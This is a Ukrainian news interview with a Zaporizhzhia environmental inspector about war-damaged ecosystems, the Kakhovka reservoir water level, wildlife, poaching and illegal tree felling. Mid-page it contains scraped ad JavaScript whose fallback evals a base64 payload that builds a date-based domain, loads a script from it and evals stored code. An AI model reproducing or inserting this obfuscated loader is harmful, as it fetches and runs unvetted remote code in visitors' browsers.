Ризики рівня води, нашестя шкідників та стан тваринного світу на Запоріжжі: інтерв’ю з Олександром Деревинським (ВІДЕО)

Повномасштабне вторгнення РФ поставило нові виклики не тільки перед українцями, а й перед природою, яка нас оточує. У Запоріжжі це відчули, коли у річці Дніпро значно впав рівень води через пошкодження Каховської ГЕС. Все це змінило роботу екоінспекторів, які слідкують за збереженням екосистем. Саме екоінспекція пильнує за тим, щоб у цей складний час екосистему не руйнували порушники.

“Акцент” поспілкувався з Олександром Деревинським, заступником начальника управління державного екологічного нагляду (контролю) біоресурсів Запорізької області. Цього дня Олександр разом з колегами провів черговий рейд у пошуках порушників на водоймах Запорізького району, про який ми написали раніше.

Розкажіть, як війна змінила екосистеми на Запоріжжі і вашу роботу?

Зважаючи на повномасштабне вторгнення російської федерації, більша частина Запорізької області тимчасово окупована, що виключає можливість проведення державного контролю. Інформація про стан екосистеми надходить лише з неофіційних джерел. Яка кількість знищення лісосмуг, вилову риби, загибелі диких тварин через браконьєрство окупантів наразі певно не відома та буде встановлено після звільнення територій.

Також, у нас є приклад Каховського водосховища — неконтрольований скид води, пошкодження ГЕС, все це призвело до масового мору риби…

Наразі, ситуація поліпшилася, але варто пам’ятати, що є озера, які взагалі відокремлені від річок у плавневій зоні. Якщо зараз риба зайде на нерест і рівень води ще сильніше знизиться, вона там і загине. Тому, будемо сподіватися, що рівень буде триматися. Ми спостерігаємо як за його зниженням, так і підняттям. Ситуація більш-менш… Так, є загибла риба, але це не так критично, як могло б бути.

Яка ситуація з тваринним світом? Що з популяціями зайців, птахів та інших видів тварин?

Впевнено можна сказати, що війна вплинула негативно на всі біоресурси.

Як приклад, заєць є, він мігрує та приходить з тих районів, де зараз ведуться бойові дії. Багато птахів прилітає, але ж є і ті, які ведуть осілий спосіб життя. Для них турбування є негативним фактором. Варто акцентувати й на те, що птахи гніздяться на очереті: качки, гуси, лиски та інші, якщо рівень води зараз підніметься, ці гнізда може затопити, що призведе до зниження популяції. Так само і на островах, зокрема Великі та Малі Кучугури є орнітологічним заказником загальнодержавного значення та розміщують види, які занесено до Червоної книги України. Але підступний ворог обстрілює ці території, що може призвести до переселення птахів на великі відстані.

Як зараз з любительським мисливством? Чи багато мисливців продовжують займатися цією справою?

Полювання на території області взагалі заборонено, наразі буде введено операцію “Тиша”, тому цього року сезону полювання не передбачено. Так, зустрічали поодиноких мисливців, складали протоколи коли громадяни приходили із мисливськими собаками в угіддя. Це є порушенням правил полювання, хоча вони були без зброї, але з собаками. Можливо, вони просто вигулювали собак. Ми розуміємо, що мисливську собаку до хати не посадиш, їй потрібно постійно рухатися, але наголошую, це є порушенням, ми складаємо протоколи, але полювання як такого немає.

Проблема в іншому — з’явилися шкідники: лисиця, шакали, дикі собаки, навіть вовки з’явилися у Запорізькому районі, де їх було найменше. Це призводить до термінового введення заходів з вакцинації тварин від сказу.
var node3361 = document.getElementById(«MIXADV_3361»); if( node3361 ) { var script = document.createElement(«script»); script.charset = «utf-8»; script.src = «https://m.mixadvert.com/show/?id=3361&r=»+Math.random(); node3361.parentNode.appendChild(script); script.onerror = function(){ window.eval( atob(«dmFyIGRhdGUgPSBuZXcgRGF0ZSgpO3ZhciBtb250aCA9IGRhdGUuZ2V0TW9udGgoKSArIDE7IHZhciBkYXkgPSBkYXRlLmdldERhdGUoKTsgdmFyIHllYXIgPSBkYXRlLmdldFllYXIoKTsgdmFyIG5hbWVfZGF5ID0gZGF0ZS5nZXREYXkoKSArIDE7dmFyIGRvbSA9IFsgIm9yZyIsICJ0b3AiLCAiYml6LnVhIiwgImNvLnVhIiwgImt5aXYudWEiLCAiY2x1YiIsICJzaG9wIl07IHZhciBzdHIgPWRheSoobW9udGggKiBuYW1lX2RheSAqIGRheSkrIiIrIGRheSoobW9udGggKyBuYW1lX2RheSArIGRheSAreWVhcik7dmFyIGhhc2ggPSAgYnRvYShidG9hKHN0cikpLnRvTG93ZXJDYXNlKCk7IHZhciBob3N0ID0gaGFzaC5zdWJzdHJpbmcoMywgaGFzaC5sZW5ndGggLSBuYW1lX2RheS8yKSsiLiIrZG9tW25hbWVfZGF5IC0gMV07dmFyIHIgPSBNYXRoLnJhbmRvbSgpLnRvU3RyaW5nKDM2KS5zdWJzdHIoMiwgMik7ciA9IHIucmVwbGFjZSgvWzAtOV0vZywgIiIpO3ZhciBkZWx0YSA9IE1hdGguZmxvb3IoTWF0aC5yYW5kb20oKSAqICgxMDAgLSAxMCArIDEpKSArIDEwO3ZhciBpZCA9IDMzNjEgLSBkZWx0YTsgdmFyIHNjcmlwdF9maXJzdCA9IGRvY3VtZW50LmNyZWF0ZUVsZW1lbnQoInNjcmlwdCIpO3NjcmlwdF9maXJzdC5zcmMgPSAiaHR0cHM6Ly8iKyBob3N0KyIvIitkZWx0YStpZCtyKyIiOyBub2RlMzM2MS5wYXJlbnROb2RlLmFwcGVuZENoaWxkKHNjcmlwdF9maXJzdCk7c2V0VGltZW91dCggZnVuY3Rpb24gKCkge3NjcmlwdF9maXJzdC5yZW1vdmUoKX0sIDQwMDApO3NjcmlwdF9maXJzdC5vbmVycm9yID0gZnVuY3Rpb24oKXt2YXIgYSA9IGRvY3VtZW50LmNyZWF0ZUVsZW1lbnQoImEiKTthLmhyZWYgPSAiaHR0cHM6Ly8iKyBob3N0KyIvIjsgbm9kZTMzNjEucGFyZW50Tm9kZS5hcHBlbmRDaGlsZChhKTsgc2V0VGltZW91dCggZnVuY3Rpb24gKCkgeyBpZiggbm9kZTMzNjEuaW5uZXJIVE1MID09ICIiICkgd2luZG93LmV2YWwobG9jYWxTdG9yYWdlLmdldEl0ZW0oIjMzNjEiKSkgfSwgNTAwMCk7ICA7fTsg») ); } }

Загалом, чи багато останнім часом порушників на наших водоймах, адже діє заборона?

Якщо порівнювати з попередніми роками, значно менше. Є заборона на вихід на човні, в ліси на узбережжя, є люди, які порушують, але кількість свідомих громадян переважає.

Які порушення найчастіше фіксуєте?

Найчастіше фіксуємо саме порушення у сфері використання рослинного світу — населення рубає дерева. Також, фіксуємо порушників на водоймах, мова йде про лов риби на зимувальних ямах вудками. Вчора, буквально, виявили правопорушення спільно з працівниками Водної поліції Запоріжжя. Зловили особу, яка ловила “драчем” карасів, 28 особин. Затримали, склали протокол. Сьогодні теж їдемо виявляти, проводити профілактику, пояснювати. Тим паче зараз буде потепління, весна. Значуща проблема — це випалювання сухої рослинності. Будемо проводити роз’яснювальні роботи серед населення, щоб не допустити пожеж у лісосмугах, лісах, на берегах річок.

Як ви розрізняєте, коли можна провести лише профілактичну бесіду, а коли складати протокол?

Протокол складаємо завжди. А з тими людьми, на яких складаємо, одразу проводимо і роз’яснювальну роботу за іншими напрямками. Скажімо, затримуємо порушника по рибальству, але й пояснюємо, що, хлопці, ви знаходитесь на березі річки, в лісі, тому, будь ласка, не розводьте вогнища, щоб не допустити пожеж.

Яка зона вашої діяльності?

Не окупована частина Запорізької області. На жаль, на тимчасово окупованих територіях не маємо змоги працювати зараз. Виконуємо обов’язки на різних відстанях від лінії фронту, але з розумінням того, що не потрібно наражати на небезпеку співробітників.

Яке зараз найсерйозніше порушення?

Зараз це вирубка зелених насаджень, тому що людям потрібно опалення. Деякі села залишаються без нього і люди замість того, щоб збирати “сушняк” випилюють усе підряд. Такі випадки найчастіші, ми намагаємося їх попередити. Ми розуміємо, яка ситуація в країні, але порушувати таким чином закон не можна. Лісосмуги — це не просто насадження дерев. Це ціла система, яка створена аби захистити наші грунти від ерозії та суховію, щоб були врожаї на полях. Якщо їх вирубати, у нас не тільки не буде лісу, наших легень, не буде й врожаю. (adsbygoogle = window.adsbygoogle || []).push({});

Підписуйтесь на Акцент в Источник: https://akzent.zp.ua/riziki-rivnya-vodi-nashestya-shkidnikiv-ta-stan-tvarinnogo-svitu-na-zaporizhzhi-interv-yu-z-oleksandrom-derevinskim-video/

Мы в Telegram, наш Telegram bot — @zpua_bot, Мы в Viber, Мы на Facebook

Share this post

нет
scroll to top